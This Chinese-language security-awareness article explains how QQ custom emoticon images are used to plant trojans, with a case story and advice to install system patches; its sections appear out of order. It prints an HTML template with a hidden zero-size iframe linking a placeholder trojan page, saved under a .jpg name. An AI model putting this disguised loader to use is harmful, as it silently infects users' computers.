如何防止qq表情盗号木马

　　编者按：相信QQ是广大网友都非常熟悉的聊天工具了。有相当一部分朋友对于QQ的自定义表情非常喜爱，甚至自己制作个性化的自定义表情共享给大家。但是在我们享受各种个性化表情的时候，黑客也通过这些表情图片悄悄地潜入我们的系统种植木马，让我们防不胜防。

　　2.利用HTML代码种植木马
　　这种利用HTML代码制作的图片木马，其实就是传统的网页木马的一种变种而已。打开记事本程序输入如下代码，并将代码另存为plmm.jpg。
　　<html><body>
　　<iframe src="网页木马地址" width="0" height="0" frameborder="0"></iframe>
　　<center><img src="真实的图片地址"></img></center>
　　</body></html>
　　这里通过一个跳转命令连链到一个网页木马的地址。
　　定点防范，找准关键
　　其实，通过图片进行木马传播已经是个老技术了。但是现在黑客通过QQ的自定义表情来主动种植木马还是要引起我们的高度重视。
　　我们可以看到，图片木马和网页木马一样，要利用系统的漏洞才能被种植进系统，所以我们可以发现，方俊朋友在安装了各种杀毒软件和防火墙后，没有及时打上系统漏洞补丁，才让黑客有可乘之机。
　　所以我们防范通过QQ自定义表情来种植木马的关键就是及时为系统打上漏洞补丁（大家可以根据自己系统情况到http://www.microsoft.com下载相应补丁包），即使是不能在第一时间安装系统的安全补丁，也可以通过使用第三方提供的补丁进行防范。
案例回放
　　姓名：方俊
　　年龄：20岁
　　案发时间：2006年2月20日
　　2月20日，方俊的一个网友通过QQ的临时聊天功能同他聊天。后来网友向方俊发送了很多QQ表情，当时方俊并没有在意，只是觉得这些图片很好玩。
　　第二天打开电脑没多久，方俊就觉得计算机运行越来越慢。通过杀毒软件杀毒也没有发现可疑的程序。后来系统越来越慢，而且常常出现“假死”现象，经过他的详细分析和一系列操作后，顺利清除了系统中的木马。
　　后来在安全专家指导下，在QQ的自定义表情中，找到的别人传给他的自定义表情图片中携带的木马。原来，QQ的自定义表情成了黑客入侵的通道。
　　案情分析：一个小小的QQ是如何被黑客利用成为入侵电脑的通道的呢？其实QQ的自定义表情传送的就是图片，那么也就容易理解这其实就是一个运用图片种植木马的伎俩。
　　QQ的自定义表情传送的实质上是图片。这些经过特殊加工的图片，再发给远程用户以后，图片首先会判断系统是否存在相应的漏洞。如果存在漏洞分块，图片就会激活这个漏洞，然后执行图片所携带的恶意代码，从而最终成功控制远程计算机。